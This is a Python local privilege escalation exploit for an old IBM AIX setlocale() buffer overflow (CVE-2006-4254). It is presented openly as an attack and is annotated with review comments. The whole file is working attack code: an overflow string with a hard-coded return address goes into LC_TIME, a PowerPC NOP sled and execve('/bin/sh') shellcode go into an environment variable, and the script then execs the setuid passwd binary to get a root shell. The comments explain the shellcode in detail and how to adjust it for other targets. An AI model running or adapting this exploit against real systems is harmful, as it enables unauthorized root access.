# Title : IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit
# Published : 2007-11-07
# Author : Thomas Pollet
#
# setlocale() buffer-overflow exploit for AIX 5.2 (CVE-2006-4254): an over-long
# LC_TIME value is placed in the environment of /usr/bin/passwd (setuid root),
# whose setlocale() call overflows on it and lands in the sled/shellcode carried
# in the EGG environment variable.
#thomas.pollet@gmail.com
#
from os import execve
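# NOTE(review): in the published listing every byte-string escape had lost its
# backslash ("x2f" instead of "\x2f"), so the "address" and the "shellcode"
# were plain ASCII text.  The escapes are restored here.  Bytes literals are
# used so the payload reaches execve() unchanged on Python 3 as well: a str
# containing "\xf2" would otherwise be UTF-8 encoded into two bytes and shift
# the whole payload.

# Overflow string handed to the target in LC_TIME: 580 bytes of filler, 12
# bytes of marker padding ("bbbb", "cccc", "dddd"), then the 4-byte value
# 0x2ff2282f that overwrites the saved control-flow target.  The value is
# hard-coded for the author's AIX 5.2 box; it presumably points somewhere
# into the 0x60 sled placed in EGG below -- confirm/adjust per target.
bof = b"a" * 580 + b"bbbbccccdddd" + b"\x2f\xf2\x28\x2f"

# Sled: 2350 bytes of 0x60.  Read as 32-bit PowerPC words, 0x60606060 decodes
# as an `ori` into a scratch register, so control can land anywhere in it and
# slide forward into the shellcode appended right after it.
egg = b"\x60" * 2350

# AIX/PowerPC execve("/bin/sh") shellcode by intropy <at> caughq.org.
# Layout, derived from the displacements below (12 instructions = 48 bytes,
# followed by the data the code patches at run time):
#   bnel is not taken (r5 == 0 after xor.) but still sets LR = code+8;
#   r31 = LR + 0x120 = code + 0x128.
#   r3  = r31 - 248 = code + 0x30  -> "/bin/sh"            (offset 48)
#   r4  = r31 - 240 = code + 0x38  -> argv[] built in place (offsets 56..63,
#                                     i.e. 8 bytes PAST the end of this blob,
#                                     into whatever follows it in memory)
#   r2  = byte at   code + 0x37    -> the trailing 0x05    (offset 55)
#   that same byte is then zeroed, NUL-terminating "/bin/sh".
# So the final 0x05 doubles as the value loaded into r2 before svca
# (presumably the AIX system-call number for execve -- verify) and as a
# placeholder for the string terminator.  r5 stays 0 and serves as argv[1]
# and envp.
shellcode = (
    b"\x7c\xa5\x2a\x79"  # xor.  r5,r5,r5        -> r5 = 0, CR0 updated
    b"\x40\x82\xff\xfd"  # bnel  <shellcode>     -> LR = &next insn (not taken)
    b"\x7f\xe8\x02\xa6"  # mflr  r31
    b"\x3b\xff\x01\x20"  # cal   r31,0x120(r31)
    b"\x38\x7f\xff\x08"  # cal   r3,-248(r31)    -> r3 = &"/bin/sh"
    b"\x38\x9f\xff\x10"  # cal   r4,-240(r31)    -> r4 = &argv[0]
    b"\x90\x7f\xff\x10"  # st    r3,-240(r31)    -> argv[0] = "/bin/sh"
    b"\x90\xbf\xff\x14"  # st    r5,-236(r31)    -> argv[1] = NULL
    b"\x88\x5f\xff\x0f"  # lbz   r2,-241(r31)    -> r2 = 0x05
    b"\x98\xbf\xff\x0f"  # stb   r5,-241(r31)    -> NUL-terminate "/bin/sh"
    b"\x4c\xc6\x33\x42"  # crorc cr6,cr6,cr6
    b"\x44\xff\xff\x02"  # svca
    b"/bin/sh"
    b"\x05"
)


def build_env() -> dict[bytes, bytes]:
    """Return the environment handed to the target.

    EGG carries the sled followed by the shellcode; LC_TIME carries the
    overflow string consumed by setlocale().  Kept separate from the exec so
    the payload can be inspected without running anything.
    """
    return {b"EGG": egg + shellcode, b"LC_TIME": bof}


def main() -> None:
    """Replace this process with /usr/bin/passwd under the crafted environment.

    argv[0] is the empty string, as in the original.  execve() only returns
    by raising OSError when the exec itself fails; on success the process
    image is gone, so nothing after this call runs.
    """
    execve(b"/usr/bin/passwd", [b""], build_env())


# Guarded so that importing this module (e.g. to inspect the payload) does
# not exec the setuid target.
if __name__ == "__main__":
    main()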